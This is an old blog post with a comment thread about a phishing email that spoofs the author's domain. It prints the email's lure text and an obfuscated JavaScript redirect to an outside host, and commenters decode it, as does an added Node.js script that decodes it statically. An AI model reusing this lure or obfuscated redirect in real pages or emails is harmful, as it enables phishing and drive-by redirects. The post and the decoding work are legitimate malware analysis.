Thursday, June 10, 2010

Javascript Phishing Trojan

Here is another bit of self-modifying JavaScript code. This one came in the form of a phishing Trojan.

dnull.com support to sokol

Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) dnull.com
Where it gets interesting is I own dnull.com and it's my server. How stupid can these guys be?

I don't have time to decipher it.

Maybe someone here will take the time.


<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

8 comments:

Anonymous said...

I received the exact same thing. In fact, while trying to research this, I did a google search of the js code, and your blog was the only search result.

Chris said...

Hey,

I work in the IT department at my company, and we've received 4 of these emails so far. Unfortunately I don't know what the JavaScript does either, but the spam email is poorly written, lots of misspellings!

If you google the code, yours is the only site that comes up.

Manuel said...

Same thing happened to me. I would really like to know what this JavaScript does...

John Sokol said...

I think the misspellings are on purpose to stop spam filters from catching it.

It's one of the few junk mails getting past gmail.com spam filters.

Anonymous said...

I dissected the code just for fun. It goes to a page at mvblaw.com, which redirects to a Canadian Viagra site.
Enjoy.

John Sokol said...

> Anonymous said...

Please, can you share the code, what tools/techniques are you using to reverse engineer the javascripts.

Anonymous said...

Just a quick look at it shows it's downloading something or another from a remote site referenced by the "encoded" part of the script.

Some of the bits are easy to see...

for instance--

hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''

is just a simple regex replace-- so do the replace yourself... and you get: http://mvblaw.com/z.htm

'lOovcvavtLi5o5n5' is location

'hqrteqfH' is href

The rest is just sorting out the JavaScript to see how each function leads to another and how they interact... I'd do it but my son's birthday is tonight and I need to leave in 2m roughly :P
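The character-class removal the commenter describes can be applied statically, so the sample can be decoded without ever executing it. The following Node.js script is an added example, not code from the post or any commenter; it embeds the script body from the post as its input and assumes only that every obfuscated literal has the `'garbled'.replace(/[chars]/g, '')` shape seen there.

```javascript
// Static decoder for the string obfuscation used in the sample above.
// The script body from the post, embedded verbatim (String.raw keeps the
// backslash inside the character class exactly as written).
const SAMPLE = String.raw`function mD(){};this.aB=43719;mD.prototype = {i : function() {
var w=new Date();this.j='';var x=function(){};
var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();
iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};
xO=false;var b=new mD(); yY="";b.i();this.xT='';`;

// Matches  'garbled'.replace(/[chars]/g, '')  and captures the literal and
// the character class. Everything else in the script (Date objects, unused
// variables, empty functions) is filler that only exists to look like
// ordinary code to a signature-based filter.
const OBFUSCATED_CALL = /'([^']*)'\.replace\(\/\[([^\]]*)\]\/g,\s*''\)/g;

// Apply each literal's own character-class removal and return the plaintext
// strings in the order they appear in the script.
function decodeReplaceLiterals(source) {
  const decoded = [];
  for (const match of source.matchAll(OBFUSCATED_CALL)) {
    const [, garbled, charClass] = match;
    decoded.push(garbled.replace(new RegExp('[' + charClass + ']', 'g'), ''));
  }
  return decoded;
}

// Pull the analyst-relevant facts out of the decoded strings: any URLs (the
// indicator to block or report) and whether the script sets location.href,
// i.e. redirects the viewer rather than merely loading a resource.
function summarize(source) {
  const decoded = decodeReplaceLiterals(source);
  return {
    decoded,
    urls: decoded.filter((s) => /^https?:\/\//i.test(s)),
    redirectsViewer: decoded.includes('location') && decoded.includes('href'),
  };
}

console.log(summarize(SAMPLE));
```

The decoded strings are `http://mvblaw.com/z.htm`, `location` and `href`, which together read as `document.location.href = 'http://mvblaw.com/z.htm'`, matching the earlier commenter's finding.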

mmengel said...

There's a good post on StackOverflow.com explaining what's going on w/ the JavaScript.

Some of the hosts appear to be clean (I contacted mvblaw.com and lendermedia.com, where it appears that neither knew about the z.htm), others appear to have more malicious intent (askverniek.com and bonenberger.net).

The method is slightly different, but the outcome is virtually the same as what you wrote about in your other post. In my comment there, I made mention of a comment I wrote here w/ some links for explanation and for complaining.